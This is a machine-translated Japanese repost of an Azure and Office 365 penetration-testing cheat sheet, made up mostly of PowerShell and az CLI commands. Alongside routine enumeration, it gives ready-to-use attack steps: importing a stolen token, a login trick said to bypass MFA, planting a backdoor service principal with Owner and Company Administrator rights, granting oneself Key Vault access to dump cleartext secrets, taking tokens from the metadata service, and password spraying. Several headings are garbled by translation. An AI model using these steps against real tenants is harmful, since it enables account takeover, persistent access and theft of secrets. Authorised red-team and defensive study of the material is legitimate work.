アジュール貫通試験
21092 ワード
マイクロソフトとAzure & O 365 CLIツールシート
ボーBullockによって
パワーシェルモジュール
Import-Module Az
認証
Connect-AzAccount
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-AzAccount -Credential $credential
コンテキストファイルのインポートImport-AzContext -Profile 'C:\Temp\Live Tokens\StolenToken.json'
コンテキストファイルのエクスポートSave-AzContext -Path C:\Temp\AzureAccessToken.json
アカウント情報
現在のazureコンテキストを一覧表示する
Get-AzContext -ListAvailable
コンテキスト詳細を取得する$context = Get-AzContext
$context.Name
$context.Account
リスト購読Get-AzSubscription
サブスクリプションを選択Select-AzSubscription -SubscriptionID "SubscriptionID"
現在のユーザのロール割り当てを取得するGet-AzRoleAssignment
すべてのリソースとリソースグループのリストGet-AzResource
Get-AzResourceGroup
リストストレージアカウントGet-AzStorageAccount
webappsとSQL
Azure Webアプリケーションの一覧
Get-AzAdApplication
Get-AzWebApp
リストSQLサーバGet-AzSQLServer
個々のデータベースは、前のコマンドGet-AzSqlDatabase -ServerName $ServerName -ResourceGroupName $ResourceGroupName
ファイアウォール規則Get-AzSqlServerFirewallRule –ServerName $ServerName -ResourceGroupName $ResourceGroupName
リストSQLサーバGet-AzSqlServerActiveDirectoryAdminstrator -ServerName $ServerName -ResourceGroupName $ResourceGroupName
ルーンブック
ルアーブック
Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -ResourceGroupName <ResourceGroupName>
Runbookをエクスポートします.Export-AzAutomationRunbook -AutomationAccountName $AccountName -ResourceGroupName $ResourceGroupName -Name $RunbookName -OutputFolder .\Desktop\
仮想マシン
リストのVMSと
Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile
VMSでコマンドを実行するInvoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1
ネットワーキング
リスト仮想ネットワーク
Get-AzVirtualNetwork
仮想NICに割り当てられたリストGet-AzPublicIpAddress
Azure Expressroute ( VPN )情報を取得するGet-AzExpressRouteCircuit
裏口
新しいAzureサービスプリンシパルをバックドアとして作成する
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$spn
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
$UnsecureSecret
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
#Enter the AppID as username and what was returned for $UnsecureSecret as the password in the Get-Credential prompt
$cred = Get-Credential
Connect-AzAccount -Credential $cred -Tenant “tenant ID" -ServicePrincipal
パワーシェルモジュール
Import-Module MSOnline
認証
Connect-MsolService
## Or this way sometimes gets around MFA restrictions
$credential = Get-Credential
Connect-MsolService -Credential $credential
アカウントとディレクトリ情報
リスト会社情報
Get-MSolCompanyInformation
リストのすべてのユーザーGet-MSolUser -All
リストのグループGet-MSolGroup -All
グループのメンバー(この場合のグローバル管理者)Get-MsolRole -RoleName "Company Administrator"
Get-MSolGroupMember –GroupObjectId $GUID
ユーザー属性一覧Get-MSolUser –All | fl
リストサービスプリンシパルGet-MsolServicePrincipal
パスワードのすべてのazure広告ユーザー属性を検索するライナー$users = Get-MsolUser; foreach($user in $users){$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; foreach($prop in $props){if($user.$prop -like "*password*"){Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)}}}
AZ CLIツール
認証
az login
アダムキー保管庫をダンプする
現在のアカウントが表示できる任意のキーVaultリソースを一覧表示
az keyvault list –query '[].name' --output tsv
貢献者レベルのアクセスを自分で秘密を取得する権利の許可を与えることができます.az keyvault set-policy --name <KeyVaultname> --upn <YourContributorUsername> --secret-permissions get list --key-permissions get list --storage-permissions get list --certificate-permissions get list
キーVaultのURIを取得するaz keyvault secret list --vault-name <KeyVaultName> --query '[].id' --output tsv
KeyVaultからクリアテキストの秘密を取得するaz keyvault secret show --id <URI from last command> | ConvertFrom-Json
メタデータサービスURL
http://169.254.169.254/metadata
メタデータサービスからアクセストークンを取得するGET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true
その他のAzure & O 365ツール
マイクロバースト
セキュリティ評価ツール
https://github.com/NetSPI/MicroBurst
オープンストレージブロックを探す
Invoke-EnumerateAzureBlobs -Base $BaseName
エクスポートSSL/TLSGet-AzPasswords -ExportCerts Y
コンテナ・ダンプGet-AzPasswords
Get-AzACR
パワーザール
セキュリティ評価ツール
https://github.com/hausec/PowerZure
ロードツール
フレームワークAzure広告との対話
https://github.com/dirkjanm/ROADtools
ストームポット
AzureとAzure広告オブジェクトをグラフ化するためのレッドチームツール
https://github.com/Azure/Stormspotter
msolスプレー
パスワードスプレーAzure/O 365へのツール
https://github.com/dafthack
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
Reference
この問題について(アジュール貫通試験), 我々は、より多くの情報をここで見つけました https://dev.to/cheahengsoon/azure-penetration-testing-cheat-sheet-4k2oテキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。
Collection and Share based on the CC Protocol